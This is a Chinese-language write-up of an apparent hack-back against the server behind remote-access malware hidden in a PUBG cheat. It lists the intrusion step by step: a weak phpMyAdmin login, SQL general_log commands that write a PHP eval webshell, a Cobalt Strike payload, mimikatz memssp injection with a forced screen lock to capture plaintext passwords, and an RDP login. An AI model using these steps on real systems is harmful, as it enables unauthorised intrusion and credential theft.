记一次对PUBG外挂病毒的反制过程
字数 1233 2025-08-25 22:58:47

PUBG外挂病毒反制过程深度分析

一、事件背景

该文档记录了对一款PUBG外挂软件("压枪神器")背后隐藏的远控病毒进行反制的完整过程。该外挂以USB加密狗形式销售,实际包含恶意软件,不仅提供游戏作弊功能,还将用户计算机作为肉鸡进行控制。

二、信息收集与分析

1. 初步检测

  • 杀毒软件报警:运行外挂软件时杀毒软件报毒,发现远控程序
  • 沙箱分析:使用微步沙箱检测软件行为,确认存在高危操作:
    • 持久化行为
    • 系统信息读取
    • 远控特征

2. 服务器定位

  • 从软件交互流量中发现HTTP协议IP地址
  • 访问http://10x.xx.xx.xx/1/1.txt确认服务器身份
  • 使用dirmap工具进行目录扫描,发现phpMyAdmin等敏感路径

三、Web渗透

1. 数据库访问

  • phpMyAdmin弱口令突破:root/root
  • 确认环境:phpStudy搭建的web服务

2. WebShell获取

通过phpMyAdmin日志功能获取WebShell:

-- 开启日志功能
set global general_log='on';

-- 检查日志状态
show variables like "general_log%";

-- 设置日志输出路径(需结合phpinfo获取网站绝对路径)
set global general_log_file ="C:\phpStudy\PHPTutorial\WWW\info.php";

-- 写入一句话木马
select '<?php eval($_POST['tools']);?>';
  • 使用中国菜刀连接WebShell
  • 确认WebShell权限级别

四、权限提升

1. 系统权限获取

  • 通过WebShell上传Cobalt Strike生成的payload(splww64.exe)
  • 执行payload获取系统级控制
  • Cobalt Strike成功上线

2. 密码获取尝试

  • 使用mimikatz尝试抓取密码:
    • 系统版本:Windows Server 2012 R2
    • 安全限制:已修复内存获取密码漏洞
    • IPC$远程认证方式改变
    • 仅能获取NTLM hash,难以破解

3. 巧取明文密码

使用mimikatz的SSP注入技术:

  1. 上传mimikatz.exe到目标系统
  2. 执行内存SSP注入: 
    C:/mimikazt.exe privilege::debug misc::memssp exit
  3. 确认注入成功(Injected =)提示)
  4. 强制锁屏: 
    rundll32.exe user32.dll,LockWorkStation
  5. 等待管理员重新登录
  6. 获取密码日志:C:\Windows\System32\mimilsa.log

4. 远程桌面访问

  • 使用nmap扫描RDP端口: 
    nmap -p 1-65355 10x.xx.xx.xx
  • 确认3389端口开放
  • 使用获取的明文密码登录系统

五、技术要点总结

  1. 信息收集

    • 从可执行文件中提取交互IP/URL作为突破口
    • 使用沙箱分析恶意软件行为
    • 目录扫描发现敏感路径

  2. Web渗透

    • 弱口令利用(root/root)
    • phpMyAdmin日志导出获取WebShell技术
    • 绝对路径获取方法

  3. 权限提升

    • WebShell到系统权限的转换
    • 现代Windows系统密码获取技术
    • mimikatz的SSP注入技术
    • 强制锁屏技巧

  4. 防御建议

    • 禁用或修改默认端口
    • 杜绝弱口令
    • 定期检查系统异常进程
    • 监控系统日志

六、安全启示

  1. 攻击链分析:一条root弱口令导致整个系统沦陷
  2. 外挂软件风险:不仅破坏游戏公平性,更可能成为黑客工具
  3. 安全意识:管理员应定期检查系统安全配置
  4. 应急响应:发现异常应及时断网排查

该案例展示了从外挂分析到完整系统控制的全过程,强调了基础安全配置的重要性,特别是弱口令和默认配置带来的巨大风险。

PUBG外挂病毒反制过程深度分析 一、事件背景 该文档记录了对一款PUBG外挂软件("压枪神器")背后隐藏的远控病毒进行反制的完整过程。该外挂以USB加密狗形式销售,实际包含恶意软件,不仅提供游戏作弊功能,还将用户计算机作为肉鸡进行控制。 二、信息收集与分析 1. 初步检测 杀毒软件报警:运行外挂软件时杀毒软件报毒,发现远控程序 沙箱分析:使用微步沙箱检测软件行为,确认存在高危操作: 持久化行为 系统信息读取 远控特征 2. 服务器定位 从软件交互流量中发现HTTP协议IP地址 访问 http://10x.xx.xx.xx/1/1.txt 确认服务器身份 使用dirmap工具进行目录扫描,发现phpMyAdmin等敏感路径 三、Web渗透 1. 数据库访问 phpMyAdmin弱口令突破:root/root 确认环境:phpStudy搭建的web服务 2. WebShell获取 通过phpMyAdmin日志功能获取WebShell: 使用中国菜刀连接WebShell 确认WebShell权限级别 四、权限提升 1. 系统权限获取 通过WebShell上传Cobalt Strike生成的payload(splww64.exe) 执行payload获取系统级控制 Cobalt Strike成功上线 2. 密码获取尝试 使用mimikatz尝试抓取密码: 系统版本:Windows Server 2012 R2 安全限制:已修复内存获取密码漏洞 IPC$远程认证方式改变 仅能获取NTLM hash,难以破解 3. 巧取明文密码 使用mimikatz的SSP注入技术: 上传mimikatz.exe到目标系统 执行内存SSP注入: 确认注入成功(Injected =)提示) 强制锁屏: 等待管理员重新登录 获取密码日志: C:\Windows\System32\mimilsa.log 4. 远程桌面访问 使用nmap扫描RDP端口: 确认3389端口开放 使用获取的明文密码登录系统 五、技术要点总结 信息收集 : 从可执行文件中提取交互IP/URL作为突破口 使用沙箱分析恶意软件行为 目录扫描发现敏感路径 Web渗透 : 弱口令利用(root/root) phpMyAdmin日志导出获取WebShell技术 绝对路径获取方法 权限提升 : WebShell到系统权限的转换 现代Windows系统密码获取技术 mimikatz的SSP注入技术 强制锁屏技巧 防御建议 : 禁用或修改默认端口 杜绝弱口令 定期检查系统异常进程 监控系统日志 六、安全启示 攻击链分析:一条root弱口令导致整个系统沦陷 外挂软件风险:不仅破坏游戏公平性,更可能成为黑客工具 安全意识:管理员应定期检查系统安全配置 应急响应:发现异常应及时断网排查 该案例展示了从外挂分析到完整系统控制的全过程,强调了基础安全配置的重要性,特别是弱口令和默认配置带来的巨大风险。